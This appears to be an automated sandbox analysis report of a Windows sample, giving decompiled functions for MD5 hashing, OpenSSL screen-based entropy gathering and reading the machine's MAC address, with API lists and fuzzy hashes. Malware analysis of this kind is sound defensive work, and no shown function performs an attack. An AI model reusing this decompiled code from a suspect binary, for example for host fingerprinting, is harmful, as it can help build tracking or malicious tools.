0x0040fd60
0x0040fd60
0x0040fd65
0x0040fd70
0x0040fd70
0x0040fd76
0x00000000
0x00000000
0x0040fd7b
0x0040fd92
0x0040fd92
0x0040fd9b
0x0040fd9d
0x00000000
0x00000000
0x0040fda3
0x0040fda8
0x0040fdb0
0x0040fdb0
0x0040fdb6
0x00000000
0x00000000
0x0040fdbb
0x0040fdd2
0x0040fdd2
0x0040fddb
0x0040fddd
0x00000000
0x00000000
0x0040fdea
0x0040fec2
0x0040fec3
0x0040fecc
0x0040fece
0x0040fed5
0x0040fed5
0x0040fede
0x00000000
0x0040fee4
0x0040fee6
0x0040feed
0x0040feef
0x0040fef0
0x0040fefa
0x0040ff02
0x0040ff07
0x0040ff13
0x0040ff19
0x0040ff1f
0x0040ff1f
0x0040ff22
0x0040ff22
0x0040ff25
0x0040ff28
0x0040ff2f
0x0040ff31
0x0040ff31
0x0040ff39
0x0040ff3c
0x0040ff48
0x0040ff53
0x0040ff55
0x0040ff59
0x0040ff5c
0x0040ff62
0x0040ff6a
0x0040ff9a
0x0040ff9a
0x0040ffa0
0x0040ffa8
0x0040ffda
0x0040ffde
0x0040ffe0
0x0040ffe9
0x0040ffeb
0x0040ffeb
0x0040ffed
0x0040ffee
0x0040ffef
0x0040fff4
0x0040fff9
0x0040fffb
0x00410005
0x0041000b
0x0041000d
0x0041000d
0x00410016
0x00410017
0x0041001b
0x0041001c
0x00410021
0x00410026
0x00410031
0x00410035
0x00410035
0x00410026
0x0040fff9
0x0041003a
0x0041003a
0x00410042
0x00410047
0x0041004c
0x0041004c
0x0041004f
0x00000000
0x0041004f
0x00000000
0x0040ffb0
0x0040ffb4
0x0040ffba
0x0040ffb6
0x0040ffb6
0x0040ffb6
0x0040ffbc
0x0040ffc2
0x0040ffc3
0x0040ffc4
0x0040ffc9
0x0040ffce
0x00000000
0x00000000
0x0040ffd0
0x0040ffd5
0x00000000
0x00000000
0x0040ffd7
0x00000000
0x0040ffd7
0x00000000
0x0040ff70
0x0040ff74
0x0040ff7a
0x0040ff76
0x0040ff76
0x0040ff76
0x0040ff7c
0x0040ff7d
0x0040ff7e
0x0040ff83
0x0040ff88
0x00000000
0x00000000
0x0040ff8a
0x0040ff8f
0x00000000
0x00000000
0x0040ff97
0x0040ff97
0x00000000
0x0040ff93
0x0040ff93
0x00000000
0x0040ff93
0x0040ff15
0x00000000
0x0040ff15
0x0040fede
0x0040fe00
0x0040fe05
0x0040fe08
0x0040fe15
0x0040fe19
0x0040fe20
0x0040fe2a
0x0040fe34
0x0040fe3b
0x0040fe3d
0x0040fe44
0x0040fe4f
0x0040fe5e
0x0040fe65
0x0040fe71
0x0040fe79
0x0040fe7e
0x0040fe7e
0x0040fe83
0x0040fe8e
0x0040fe98
0x0040fea2
0x0040fea9
0x0040feb5
0x0040feba
0x0040feba
0x00000000
0x0040fea9
0x0040fdbd
0x0040fdc1
0x0040fdc5
0x00000000
0x00000000
0x0040fdc7
0x0040fdca
0x0040fdd0
0x00000000
0x00000000
0x00000000
0x0040fdd0
0x0040fdd6
0x0040fdd8
0x00000000
0x0040fdd8
0x0040fd7d
0x0040fd81
0x0040fd85
0x00000000
0x00000000
0x0040fd87
0x0040fd8a
0x0040fd90
0x00000000
0x00000000
0x00000000
0x0040fd90
0x0040fd96
0x0040fd98
0x00000000
0x00410052
0x0041005a
0x00410060
0x00410063
0x0041006c
0x00000000
0x0041006c
0x0040fd4c
0x0040fb31
0x0040fb36
0x0040fb38
0x0040fb3a
0x0040fb41
0x0040fb48
0x0040fb49
0x0040fb50
0x0040fb55
0x0040fb5a
0x0040fb5f
0x00000000
0x00000000
0x0040fb65
0x0040fb67
0x0040fb70
0x0040fb81
0x0040fb86
0x0040fb8a
0x0040fb8c
0x0040fb8f
0x0040fb94
0x0040fbbb
0x0040fbbb
0x0040fbc0
0x0040fbc5
0x0040fbcf
0x0040fbd1
0x0040fbd1
0x0040fbd5
0x0040fbdb
0x0040fbe0
0x0040fbed
0x0040fbf5
0x0040fbf9
0x0040fc02
0x0040fc07
0x0040fc0c
0x0040fc0c
0x0040fc0f
0x0040fc14
0x0040fc1b
0x0040fc22
0x0040fc29
0x0040fc4c
0x0040fc2b
0x0040fc2e
0x0040fc2f
0x0040fc3c
0x0040fc41
0x0040fc44
0x0040fc44
0x0040fc2f
0x0040fc55
0x0040fc5b
0x0040fc60
0x0040fc6b
0x0040fc72
0x0040fc77
0x0040fc7d
0x0040fc84
0x0040fc86
0x0040fc88
0x0040fc88
0x0040fc8c
0x0040fc99
0x0040fc9f
0x0040fca1
0x0040fca1
0x0040fca5
0x0040fcab
0x0040fcb0
0x0040fcb2
0x0040fcb4
0x0040fcbb
0x0040fcc2
0x0040fcc3
0x0040fcca
0x0040fcd1
0x0040fcd7
0x0040fcdc
0x0040fcdc
0x0040fcdf
0x0040fce5
0x0040fce8
0x0040fced
0x0040fced
0x00000000
0x0040fce5
0x0040fba0
0x0040fba7
0x0040fbaf
0x0040fbb3
0x0040fbb4
0x0040fbb7
0x00000000
0x0040fba0
0x0040f789
0x0040f789
0x0040f790
0x0040f792
0x0040f799
0x0040f79b
0x0040f79c
0x0040f7a6
0x0040f7ae
0x0040f7b3
0x0040f7bc
0x0040f7be
0x0040f7bf
0x0040f7ca
0x0040f7d2
0x0040f7d9
0x0040f7de
0x0040f7e2
0x0040f7e8
0x0040f870
0x0040f874
0x0040f879
0x0040f87e
0x0040f87e
0x0040f883
0x0040f88a
0x0040f891
0x0040f898
0x0040f89c
0x0040f8a1
0x0040f8a6
0x0040f8a6
0x00000000
0x0040f89c
0x0040f7ee
0x0040f7f4
0x00000000
0x0040f7f6
0x0040f7fd
0x0040f807
0x0040f809
0x0040f813
0x0040f818
0x0040f818
0x0040f821
0x0040f827
0x0040f830
0x0040f832
0x0040f83c
0x0040f844
0x0040f844
0x0040f850
0x0040f858
0x0040f85d
0x0040f862
0x0040f867
0x0040f92b
0x0040f930
0x0040f935
0x0040f935
0x0040f938
0x0040f93a
0x0040f945
0x0040f94c
0x0040f950
0x0040f959
0x0040f95e
0x0040f95e
0x004100ea
0x004100ee
0x004100f3
0x004100f8
0x00410100
0x0041010b
0x0040f86d
0x0040f86d
0x00000000
0x0040f86d
0x0040f867
0x0040f8a9
0x0040f8a9
0x0040f8aa
0x0040f8ad
0x00000000
0x0040f790

APIs

Part of subcall function 00411AB0: PeekMessageW.USER32 ref: 00411ACA
Part of subcall function 00411AB0: DispatchMessageW.USER32 ref: 00411AE0
Part of subcall function 00411AB0: PeekMessageW.USER32 ref: 00411AEE

PathFindFileNameW.SHLWAPI(?,?,00000000,000000FF), ref: 0040F900
_memmove.LIBCMT ref: 0040F9EA
PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0040FA51
_memmove.LIBCMT ref: 0040FADA

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: Message$FileFindNamePathPeek_memmove$Dispatch
String ID:
API String ID: 273148273-0
Opcode ID: 9523524d8d3b45d9081d0fccdbbe5b8ea63895c3f5938442575e5094c992c0b6
Instruction ID: a2fe25dd57492d494e78aebb36a96054b80ce25314fb01b08d1ce03a62da89f0
Opcode Fuzzy Hash: 9523524d8d3b45d9081d0fccdbbe5b8ea63895c3f5938442575e5094c992c0b6
Instruction Fuzzy Hash: D652A271D00208DBDF20DFA4D985BDEB7B4BF05308F10817AE419B7291D779AA89CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040E870 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 165
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E0040E870(void* __ecx, void* __eflags, char _a4, intOrPtr _a20, intOrPtr _a24) {
				int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				int _v24;
				int _v28;
				long* _v32;
				int _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				long** _t48;
				int* _t49;
				char _t51;
				char _t53;
				char _t59;
				intOrPtr _t67;
				void* _t82;
				void* _t83;
				intOrPtr* _t89;
				void* _t94;
				void* _t95;
				int _t96;
				void* _t98;
				intOrPtr* _t99;
				void* _t100;
				intOrPtr _t102;
				intOrPtr _t103;
				void* _t105;

				 *[fs:0x0] = _t102;
				_t103 = _t102 - 0x38;
				_v20 = _t103;
				_t83 = __ecx;
				_v8 = 0;
				_v32 = 0;
				_v24 = 0;
				_v36 = 0;
				E004156D0(__ecx, __ecx, _t95, 0x4ffca4);
				_t48 =  &_v32;
				_v8 = 1;
				__imp__CryptAcquireContextW(_t48, 0, 0, 1, 0xf0000000, 0, _t95, _t98, _t82,  *[fs:0x0], 0x4ca9e8, 0xffffffff);
				if(_t48 == 0) {
					_v40 = _t48;
					E00430ECA( &_v40, 0x5085b8);
				}
				_t49 =  &_v24;
				__imp__CryptCreateHash(_v32, 0x8003, 0, 0, _t49);
				if(_t49 == 0) {
					_v44 = _t49;
					E00430ECA( &_v44, 0x5085b8);
				}
				_t51 =  >=  ? _a4 :  &_a4;
				__imp__CryptHashData(_v24, _t51, _a20, 0);
				if(_t51 == 0) {
					_v48 = _t51;
					E00430ECA( &_v48, 0x5085b8);
				}
				_t99 = __imp__CryptGetHashParam;
				_v28 = 0;
				_t53 =  *_t99(_v24, 2, 0,  &_v28, 0);
				_t113 = _t53;
				if(_t53 == 0) {
					_v52 = _t53;
					E00430ECA( &_v52, 0x5085b8);
				}
				_t96 = E00420BE4(_t83, _t95, _t113, _v28 + 1);
				_v36 = _t96;
				E0042B420(_t96, 0, _v28 + 1);
				_t105 = _t103 + 0x10;
				_t59 =  *_t99(_v24, 2, _t96,  &_v28, 0);
				if(_t59 == 0) {
					_v56 = _t59;
					E00430ECA( &_v56, 0x5085b8);
				}
				_t100 = 0;
				while(_t100 < _v28) {
					E004204A6( &_v72, "%.2X",  *(_t100 + _t96) & 0x000000ff);
					_t105 = _t105 + 0xc;
					if(_v72 != 0) {
						_t89 =  &_v72;
						_t39 = _t89 + 1; // 0x1
						_t94 = _t39;
						do {
							_t67 =  *_t89;
							_t89 = _t89 + 1;
							__eflags = _t67;
						} while (_t67 != 0);
						_push(_t89 - _t94);
						E00413EA0(_t83, _t83, _t96, _t100,  &_v72);
						_t100 = _t100 + 1;
					} else {
						_push(0);
						E00413EA0(_t83, _t83, _t96, _t100,  &_v72);
						_t100 = _t100 + 1;
					}
					L20:
				}
				E00422110(_t96);
				__imp__CryptDestroyHash(_v24);
				CryptReleaseContext(_v32, 0);
				__eflags = _a24 - 0x10;
				if(_a24 >= 0x10) {
					L00422587(_a4);
				}
				 *[fs:0x0] = _v16;
				return 1;
				goto L20;
			}

0x0040e881
0x0040e888
0x0040e88e
0x0040e891
0x0040e895
0x0040e8a1
0x0040e8a8
0x0040e8af
0x0040e8b6
0x0040e8c6
0x0040e8c9
0x0040e8ce
0x0040e8d6
0x0040e8d8
0x0040e8e4
0x0040e8e4
0x0040e8e9
0x0040e8f9
0x0040e901
0x0040e903
0x0040e90f
0x0040e90f
0x0040e920
0x0040e928
0x0040e930
0x0040e932
0x0040e93e
0x0040e93e
0x0040e943
0x0040e956
0x0040e95d
0x0040e95f
0x0040e961
0x0040e963
0x0040e96f
0x0040e96f
0x0040e985
0x0040e987
0x0040e98e
0x0040e993
0x0040e9a2
0x0040e9a6
0x0040e9a8
0x0040e9b4
0x0040e9b4
0x0040e9b9
0x0040e9c0
0x0040e9d3
0x0040e9d8
0x0040e9df
0x0040e9f2
0x0040e9f5
0x0040e9f5
0x0040e9f8
0x0040e9f8
0x0040e9fa
0x0040e9fb
0x0040e9fb
0x0040ea04
0x0040ea08
0x0040ea0d
0x0040e9e1
0x0040e9e6
0x0040e9ea
0x0040e9ef
0x0040e9ef
0x00000000
0x0040e9df
0x0040ea11
0x0040ea1c
0x0040ea27
0x0040ea2d
0x0040ea31
0x0040ea36
0x0040ea3b
0x0040ea43
0x0040ea50
0x00000000

APIs

CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000,00000000), ref: 0040E8CE
__CxxThrowException@8.LIBCMT ref: 0040E8E4

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F

CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040E8F9
__CxxThrowException@8.LIBCMT ref: 0040E90F
CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 0040E928
__CxxThrowException@8.LIBCMT ref: 0040E93E
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 0040E95D
__CxxThrowException@8.LIBCMT ref: 0040E96F
_memset.LIBCMT ref: 0040E98E
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040E9A2
__CxxThrowException@8.LIBCMT ref: 0040E9B4
_sprintf.LIBCMT ref: 0040E9D3

Strings

%.2X, xrefs: 0040E9CD

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
String ID: %.2X
API String ID: 1084002244-213608013
Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
Instruction ID: 6020eefb82f776eec2353dc0ff897aa1862dcd4ecc30860888fbdadc8ba65bc1
Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
Instruction Fuzzy Hash: 835173B1E40209EBDF11DFA2DC46FEEBB78EB04704F10452AF501B61C1D7796A158BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040EAA0 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 159
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E0040EAA0(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				int _v24;
				int _v28;
				long* _v32;
				int _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				long** _t42;
				int* _t43;
				char _t45;
				char _t51;
				intOrPtr _t58;
				void* _t72;
				intOrPtr* _t80;
				void* _t86;
				void* _t87;
				void* _t88;
				int _t89;
				void* _t91;
				void* _t92;
				intOrPtr* _t93;
				void* _t94;
				intOrPtr _t96;
				intOrPtr _t97;
				void* _t99;

				 *[fs:0x0] = _t96;
				_t97 = _t96 - 0x38;
				_t73 = _a4;
				_v20 = _t97;
				_t88 = __ecx;
				_v32 = 0;
				_t92 = __edx;
				_v24 = 0;
				_v36 = 0;
				E004156D0(_a4, _t73, __ecx, 0x4ffca4);
				_t42 =  &_v32;
				_v8 = 0;
				__imp__CryptAcquireContextW(_t42, 0, 0, 1, 0xf0000000, 0, _t87, _t91, _t72,  *[fs:0x0], 0x4caa00, 0xffffffff);
				if(_t42 == 0) {
					_v40 = _t42;
					E00430ECA( &_v40, 0x5085b8);
				}
				_t43 =  &_v24;
				__imp__CryptCreateHash(_v32, 0x8003, 0, 0, _t43);
				if(_t43 == 0) {
					_v44 = _t43;
					_t43 = E00430ECA( &_v44, 0x5085b8);
				}
				__imp__CryptHashData(_v24, _t88, _t92, 0);
				if(_t43 == 0) {
					_v48 = _t43;
					E00430ECA( &_v48, 0x5085b8);
				}
				_t93 = __imp__CryptGetHashParam;
				_v28 = 0;
				_t45 =  *_t93(_v24, 2, 0,  &_v28, 0);
				_t105 = _t45;
				if(_t45 == 0) {
					_v52 = _t45;
					E00430ECA( &_v52, 0x5085b8);
				}
				_t89 = E00420BE4(_t73, _t88, _t105, _v28 + 1);
				_v36 = _t89;
				E0042B420(_t89, 0, _v28 + 1);
				_t99 = _t97 + 0x10;
				_t51 =  *_t93(_v24, 2, _t89,  &_v28, 0);
				if(_t51 == 0) {
					_v56 = _t51;
					E00430ECA( &_v56, 0x5085b8);
				}
				_t94 = 0;
				while(_t94 < _v28) {
					E004204A6( &_v72, "%.2X",  *(_t94 + _t89) & 0x000000ff);
					_t99 = _t99 + 0xc;
					if(_v72 != 0) {
						_t80 =  &_v72;
						_t35 = _t80 + 1; // 0x1
						_t86 = _t35;
						do {
							_t58 =  *_t80;
							_t80 = _t80 + 1;
							__eflags = _t58;
						} while (_t58 != 0);
						_push(_t80 - _t86);
						E00413EA0(_t73, _t73, _t89, _t94,  &_v72);
						_t94 = _t94 + 1;
					} else {
						_push(0);
						E00413EA0(_t73, _t73, _t89, _t94,  &_v72);
						_t94 = _t94 + 1;
					}
					L18:
				}
				E00422110(_t89);
				__imp__CryptDestroyHash(_v24);
				CryptReleaseContext(_v32, 0);
				 *[fs:0x0] = _v16;
				return 1;
				goto L18;
			}

0x0040eab1
0x0040eab8
0x0040eabc
0x0040eac1
0x0040eac4
0x0040eacf
0x0040ead6
0x0040ead8
0x0040eadf
0x0040eae6
0x0040eaf6
0x0040eaf9
0x0040eb01
0x0040eb09
0x0040eb0b
0x0040eb17
0x0040eb17
0x0040eb1c
0x0040eb2c
0x0040eb34
0x0040eb36
0x0040eb42
0x0040eb42
0x0040eb4e
0x0040eb56
0x0040eb58
0x0040eb64
0x0040eb64
0x0040eb69
0x0040eb7c
0x0040eb83
0x0040eb85
0x0040eb87
0x0040eb89
0x0040eb95
0x0040eb95
0x0040ebab
0x0040ebad
0x0040ebb4
0x0040ebb9
0x0040ebc8
0x0040ebcc
0x0040ebce
0x0040ebda
0x0040ebda
0x0040ebdf
0x0040ebe1
0x0040ebf4
0x0040ebf9
0x0040ec00
0x0040ec13
0x0040ec16
0x0040ec16
0x0040ec20
0x0040ec20
0x0040ec22
0x0040ec23
0x0040ec23
0x0040ec2c
0x0040ec30
0x0040ec35
0x0040ec02
0x0040ec07
0x0040ec0b
0x0040ec10
0x0040ec10
0x00000000
0x0040ec00
0x0040ec39
0x0040ec44
0x0040ec4f
0x0040ec5a
0x0040ec67
0x00000000

APIs

CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000), ref: 0040EB01
__CxxThrowException@8.LIBCMT ref: 0040EB17

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F

CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040EB2C
__CxxThrowException@8.LIBCMT ref: 0040EB42
CryptHashData.ADVAPI32(00000000,?,?,00000000), ref: 0040EB4E
__CxxThrowException@8.LIBCMT ref: 0040EB64
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,?,00000000), ref: 0040EB83
__CxxThrowException@8.LIBCMT ref: 0040EB95
_memset.LIBCMT ref: 0040EBB4
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040EBC8
__CxxThrowException@8.LIBCMT ref: 0040EBDA
_sprintf.LIBCMT ref: 0040EBF4
CryptDestroyHash.ADVAPI32(00000000), ref: 0040EC44
CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0040EC4F

Strings

%.2X, xrefs: 0040EBEE

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
String ID: %.2X
API String ID: 1637485200-213608013
Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
Instruction ID: 14d7d02cf3c54262bdef7e6fa07b3cadf7b2b7504ea62fb0b9d39e8d8664034d
Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
Instruction Fuzzy Hash: A6515371E40209ABDF11DBA6DC46FEFBBB8EB04704F14052AF505B62C1D77969058BA8

Uniqueness

Uniqueness Score: -1.00%

Function 004822E0 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 127
windowCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E004822E0(void* __edx, void* __eflags, void* _a4, void _a8, signed short _a12, int _a16, struct HDC__* _a24, signed int _a108) {
				void* _v8;
				int _v16;
				char _v20;
				struct HDC__* _v24;
				struct HDC__* _v28;
				struct HDC__* _v44;
				struct HBITMAP__* _v48;
				intOrPtr _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t27;
				void* _t58;
				void* _t59;
				struct HDC__* _t60;
				long _t63;
				struct HDC__* _t64;
				void* _t67;
				void* _t69;
				struct HDC__* _t70;
				void* _t71;
				void* _t73;
				void* _t75;
				int _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_t67 = __edx;
				_t80 = _t79 & 0xffffffc0;
				E0042F7C0(0x74);
				_t27 =  *0x50ad20; // 0x4ea20c1c
				_a108 = _t27 ^ _t80;
				_push(_t58);
				if(E004549A0(_t58) <= 0) {
					_t70 = CreateDCA("DISPLAY", 0, 0, 0);
					_a24 = _t70;
					_t60 = CreateCompatibleDC(_t70);
					_a24 = _t60;
					_a24 = GetDeviceCaps(_t70, 8);
					_a12 = GetDeviceCaps(_t70, 0xa);
					_t75 = CreateCompatibleBitmap(_t70, _a16, 0x10);
					_a8 = _t75;
					_a4 = SelectObject(_t60, _t75);
					GetObjectA(_t75, 0x18,  &_a8);
					_t63 = (_a12 & 0x0000ffff) * _a4 * _a8;
					_t71 = E00454E50(_t63, ".\\crypto\\rand\\rand_win.c", 0x306);
					_t80 = _t80 + 0xc;
					if(_t71 != 0) {
						_t77 = 0;
						_t85 = _v20 + 0xfffffff0;
						if(_v20 + 0xfffffff0 > 0) {
							do {
								BitBlt(_v24, 0, 0, _v16, 0x10, _v28, 0, _t77, 0xcc0020);
								GetBitmapBits(_v48, _t63, _t71);
								_push(0);
								_push(E00479F90());
								_push(0);
								_push( &_v28);
								_push(_t63);
								_push(_t71);
								E00480550(_t63, _t67, _t71, _t78, _t85);
								E0042F7C0(8);
								asm("xorps xmm0, xmm0");
								asm("movsd [esp], xmm0");
								E0045D550(_t63, _t71, _t77, _t78,  &_v20, 0x14);
								_t77 = _t77 + 0x10;
								_t80 = _t80 + 0x28;
							} while (_t77 < _v60 + 0xfffffff0);
						}
						E00454C70(_t71);
						_t80 = _t80 + 4;
					}
					_t64 = _v24;
					DeleteObject(SelectObject(_t64, _v8));
					DeleteDC(_t64);
					DeleteDC(_v44);
				}
				_pop(_t69);
				_pop(_t73);
				_pop(_t59);
				return E0042A77E(_t59, _a108 ^ _t80, _t67, _t69, _t73);
			}

0x004822e0
0x004822e3
0x004822eb
0x004822f0
0x004822f7
0x004822fb
0x00482305
0x0048231c
0x0048231f
0x0048232f
0x00482334
0x0048233d
0x00482349
0x00482354
0x00482358
0x00482362
0x0048236e
0x00482388
0x00482393
0x00482395
0x0048239a
0x004823a4
0x004823a9
0x004823ab
0x004823b0
0x004823ca
0x004823d6
0x004823dc
0x004823e3
0x004823e4
0x004823ea
0x004823eb
0x004823ec
0x004823ed
0x004823fa
0x004823ff
0x00482406
0x0048240e
0x00482417
0x0048241d
0x00482420
0x004823b0
0x00482425
0x0048242a
0x0048242a
0x00482431
0x0048243d
0x0048244a
0x00482450
0x00482450
0x00482456
0x00482457
0x00482458
0x00482463

APIs

Part of subcall function 004549A0: GetModuleHandleA.KERNEL32(?,?,00000001,?,00454B72), ref: 004549C7
Part of subcall function 004549A0: GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
Part of subcall function 004549A0: GetDesktopWindow.USER32 ref: 004549FB
Part of subcall function 004549A0: GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
Part of subcall function 004549A0: GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
Part of subcall function 004549A0: _wcsstr.LIBCMT ref: 00454A8A

CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00482316
CreateCompatibleDC.GDI32(00000000), ref: 00482323
GetDeviceCaps.GDI32(00000000,00000008), ref: 00482338
GetDeviceCaps.GDI32(00000000,0000000A), ref: 00482341
CreateCompatibleBitmap.GDI32(00000000,?,00000010), ref: 0048234E
SelectObject.GDI32(00000000,00000000), ref: 0048235C
GetObjectA.GDI32(00000000,00000018,?), ref: 0048236E
BitBlt.GDI32(?,00000000,00000000,?,00000010,?,00000000,00000000,00CC0020), ref: 004823CA
GetBitmapBits.GDI32(?,?,00000000), ref: 004823D6
SelectObject.GDI32(?,?), ref: 00482436
DeleteObject.GDI32(00000000), ref: 0048243D
DeleteDC.GDI32(?), ref: 0048244A
DeleteDC.GDI32(?), ref: 00482450

Strings

DISPLAY, xrefs: 00482311
.\crypto\rand\rand_win.c, xrefs: 00482383

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: Object$CreateDelete$BitmapCapsCompatibleDeviceInformationSelectUserWindow$AddressBitsDesktopErrorHandleLastModuleProcProcessStation_wcsstr
String ID: .\crypto\rand\rand_win.c$DISPLAY
API String ID: 151064509-1805842116
Opcode ID: 1b801d1ffbd88b82039091f0604768a30c592b3e6827ab76a1e426d578563625
Instruction ID: 00d76d2b57e2ae43ffa0e146b327d2d4306243c0a97269805a4caa25bb15a565
Opcode Fuzzy Hash: 1b801d1ffbd88b82039091f0604768a30c592b3e6827ab76a1e426d578563625
Instruction Fuzzy Hash: 0441BB71944300EBD3105BB6DC86F6FBBF8FF85B14F00052EFA54962A1E77598008B6A

Uniqueness

Uniqueness Score: -1.00%

Function 0040E670 Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E0040E670(void* __ebx, void* __ecx, void* __eflags) {
				char _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char* _t14;
				char* _t15;
				void* _t35;
				void* _t36;
				void* _t37;
				char* _t41;
				void* _t44;
				void* _t45;

				_t33 = __ebx;
				_push(_t36);
				_v8 = 0x288;
				_t37 = E00420C62(__ebx, _t35, _t36, 0x12);
				_t41 = E00420C62(__ebx, _t35, _t37, 0x288);
				_t45 = _t44 + 8;
				_t49 = _t41;
				if(_t41 != 0) {
					_t14 =  &_v8;
					__imp__GetAdaptersInfo(_t41, _t14);
					__eflags = _t14 - 0x6f;
					if(_t14 != 0x6f) {
						L4:
						_t15 =  &_v8;
						__imp__GetAdaptersInfo(_t41, _t15);
						__eflags = _t15;
						if(_t15 == 0) {
							_push( *(_t41 + 0x199) & 0x000000ff);
							_push( *(_t41 + 0x198) & 0x000000ff);
							_push( *(_t41 + 0x197) & 0x000000ff);
							_push( *(_t41 + 0x196) & 0x000000ff);
							_push( *(_t41 + 0x195) & 0x000000ff);
							E004204A6(_t37, "%02X:%02X:%02X:%02X:%02X:%02X",  *(_t41 + 0x194) & 0x000000ff);
							_push(_t37);
							_t11 = _t41 + 0x1b0; // 0x1b0
							_push("Address: %s, mac: %s\n");
							E00421F2D(_t33, _t37, _t41, __eflags);
							_push("\n");
							E00421F2D(_t33, _t37, _t41, __eflags);
							_t45 = _t45 + 0x30;
						}
						E00420BED(_t41);
						return _t37;
					} else {
						E00420BED(_t41);
						_t41 = E00420C62(_t33, _t35, _t37, _v8);
						_t45 = _t45 + 8;
						__eflags = _t41;
						if(__eflags == 0) {
							goto L1;
						} else {
							goto L4;
						}
					}
				} else {
					L1:
					_push("Error allocating memory needed to call GetAdaptersinfo\n");
					E00421F2D(_t33, _t37, _t41, _t49);
					E00420BED(_t37);
					return 0;
				}
			}

0x0040e670
0x0040e675
0x0040e678
0x0040e689
0x0040e690
0x0040e692
0x0040e695
0x0040e697
0x0040e6b4
0x0040e6b9
0x0040e6bf
0x0040e6c2
0x0040e6db
0x0040e6db
0x0040e6e0
0x0040e6e6
0x0040e6e8
0x0040e6f1
0x0040e6f9
0x0040e701
0x0040e709
0x0040e711
0x0040e720
0x0040e725
0x0040e726
0x0040e72d
0x0040e732
